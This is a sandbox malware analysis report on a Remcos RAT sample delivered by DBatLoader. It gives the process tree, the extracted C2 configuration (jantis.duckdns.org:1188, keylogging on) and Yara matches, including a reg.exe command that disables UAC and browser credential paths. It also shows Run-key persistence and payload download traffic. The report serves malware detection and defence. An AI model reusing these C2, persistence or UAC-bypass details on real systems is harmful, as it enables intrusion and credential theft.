Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XY2I8rWLkM.exe

Overview

General Information

Sample name:XY2I8rWLkM.exe
renamed because original name is a hash value
Original sample name:29af19382bdeadee6d93b98f354e703d.exe
Analysis ID:1428364
MD5:29af19382bdeadee6d93b98f354e703d
SHA1:3d38885812aa0c910025d86e05287600c745f5c8
SHA256:8a005601e52341e8aff3c95cf30f4ede6b874d2b7e6ffdb9afda9425733fc5d7
Tags:exeRATRemcosRAT
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Creation with Colorcpl
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XY2I8rWLkM.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\XY2I8rWLkM.exe" MD5: 29AF19382BDEADEE6D93B98F354E703D)
    • cmd.exe (PID: 3452 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 2108 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\XY2I8rWLkM.exe C:\\Users\\Public\\Libraries\\Ocihlomc.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • colorcpl.exe (PID: 2800 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Ocihlomc.PIF (PID: 6544 cmdline: "C:\Users\Public\Libraries\Ocihlomc.PIF" MD5: 29AF19382BDEADEE6D93B98F354E703D)
    • SndVol.exe (PID: 2380 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Ocihlomc.PIF (PID: 3012 cmdline: "C:\Users\Public\Libraries\Ocihlomc.PIF" MD5: 29AF19382BDEADEE6D93B98F354E703D)
    • colorcpl.exe (PID: 6164 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "jantis.duckdns.org:1188:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TALGAI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\ffrrdds\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\Public\Libraries\OcihlomcO.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
    • 0x2:$s1: &@cls&@set
    • 0x5b:$s2: :~41,1%%
    • 0x67:$s2: :~47,1%%
    • 0x73:$s2: :~6,1%%
    • 0x7e:$s2: :~53,1%%
    • 0x8a:$s2: :~1,1%
    • 0x9b:$s2: :~10,1%%
    • 0xa7:$s2: :~39,1%%
    • 0xb3:$s2: :~16,1%%
    • 0xbf:$s2: :~13,1%%
    • 0xcb:$s2: :~25,1%%
    • 0xd7:$s2: :~53,1%%
    • 0xe3:$s2: :~42,1%%
    • 0xef:$s2: :~22,1%%
    • 0xfb:$s2: :~18,1%%
    • 0x107:$s2: :~48,1%%
    • 0x113:$s2: :~51,1%%
    • 0x11f:$s2: :~2,1%%
    • 0x12a:$s2: :~61,1%%
    • 0x136:$s2: :~9,1%%
    • 0x141:$s2: :~19,1%%

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        00000007.00000002.2154857966.0000000002AE1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000A.00000002.2212258273.00000000029B1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              Click to see the 28 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.2.SndVol.exe.1c630000.2.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                8.2.SndVol.exe.1c630000.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  8.2.SndVol.exe.1c630000.2.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4a8:$a1: Remcos restarted by watchdog!
                  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                  8.2.SndVol.exe.1c630000.2.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6656c:$str_b2: Executing file:
                  • 0x675ec:$str_b3: GetDirectListeningPort
                  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67118:$str_b7: \update.vbs
                  • 0x66594:$str_b9: Downloaded file:
                  • 0x66580:$str_b10: Downloading file:
                  • 0x66624:$str_b12: Failed to upload file:
                  • 0x675b4:$str_b13: StartForward
                  • 0x675d4:$str_b14: StopForward
                  • 0x67070:$str_b15: fso.DeleteFile "
                  • 0x67004:$str_b16: On Error Resume Next
                  • 0x670a0:$str_b17: fso.DeleteFolder "
                  • 0x66614:$str_b18: Uploaded file:
                  • 0x665d4:$str_b19: Unable to delete:
                  • 0x67038:$str_b20: while fso.FileExists("
                  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
                  8.2.SndVol.exe.1c630000.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x6637c:$s1: CoGetObject
                  • 0x66390:$s1: CoGetObject
                  • 0x663ac:$s1: CoGetObject
                  • 0x70338:$s1: CoGetObject
                  • 0x6633c:$s2: Elevation:Administrator!new:
                  Click to see the 58 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Execution from Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ocihlomc.PIF, NewProcessName: C:\Users\Public\Libraries\Ocihlomc.PIF, OriginalFileName: C:\Users\Public\Libraries\Ocihlomc.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , ProcessId: 6544, ProcessName: Ocihlomc.PIF
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Ocihlomc.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XY2I8rWLkM.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ocihlomc
                  Sigma detected: Suspicious Creation with Colorcpl
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2800, TargetFilename: \Device\ConDrv\\Connect
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Ocihlomc.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XY2I8rWLkM.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ocihlomc
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ocihlomc.PIF, NewProcessName: C:\Users\Public\Libraries\Ocihlomc.PIF, OriginalFileName: C:\Users\Public\Libraries\Ocihlomc.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Ocihlomc.PIF" , ProcessId: 6544, ProcessName: Ocihlomc.PIF

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 69 C5 7C 24 5C CE D8 EB 10 90 88 40 CA B7 66 13 EF 52 F0 2D E4 CC 0A D2 71 54 A9 F1 F5 5B 65 F7 DC 39 28 C8 42 5F 80 AD 25 33 BA 77 6D 96 A3 A4 79 9E 1C 74 3A CC 2B 3A 01 A8 21 6D 00 D5 D6 21 63 E6 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-TALGAI\exepath

                  Snort Signatures

                  Timestamp:04/18/24-21:26:56.124863
                  SID:2032776
                  Source Port:49707
                  Destination Port:1188
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:04/18/24-21:29:11.385348
                  SID:2032777
                  Source Port:1188
                  Destination Port:49707
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                  Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                  Antivirus detection for dropped file
                  Source: C:\Users\Public\Libraries\netutils.dllAvira: detection malicious, Label: TR/AVI.Agent.rqsyc
                  Found malware configuration
                  Source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jantis.duckdns.org:1188:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TALGAI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFReversingLabs: Detection: 52%
                  Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 44%
                  Multi AV Scanner detection for submitted file
                  Source: XY2I8rWLkM.exeReversingLabs: Detection: 52%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED
                  Machine Learning detection for dropped file
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: XY2I8rWLkM.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04693837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_04693837
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C663837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_1C663837
                  Source: colorcpl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046674FD _wcslen,CoGetObject,5_2_046674FD
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6374FD _wcslen,CoGetObject,8_2_1C6374FD
                  Source: XY2I8rWLkM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2037895391.0000000014C50000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028A58CC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04669665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669665
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04669253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669253
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0467C291
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0466C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0466BD37
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046AE879 FindFirstFileExA,5_2_046AE879
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466783C FindFirstFileW,FindNextFileW,5_2_0466783C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0466880C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04679AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_04679AF5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0466BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_1C63BD37
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C67E879 FindFirstFileExA,8_2_1C67E879
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63783C FindFirstFileW,FindNextFileW,8_2_1C63783C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_1C63880C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C649AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_1C649AF5
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_1C63BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C639665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639665
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C639253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639253
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C64C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_1C64C291
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_1C63C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04667C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04667C97

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49707 -> 103.186.117.171:1188
                  Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 103.186.117.171:1188 -> 192.168.2.5:49707
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: jantis.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: jantis.duckdns.org
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BC8AC InternetCheckConnectionA,0_2_028BC8AC
                  Source: global trafficTCP traffic: 192.168.2.5:49707 -> 103.186.117.171:1188
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: GET /download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
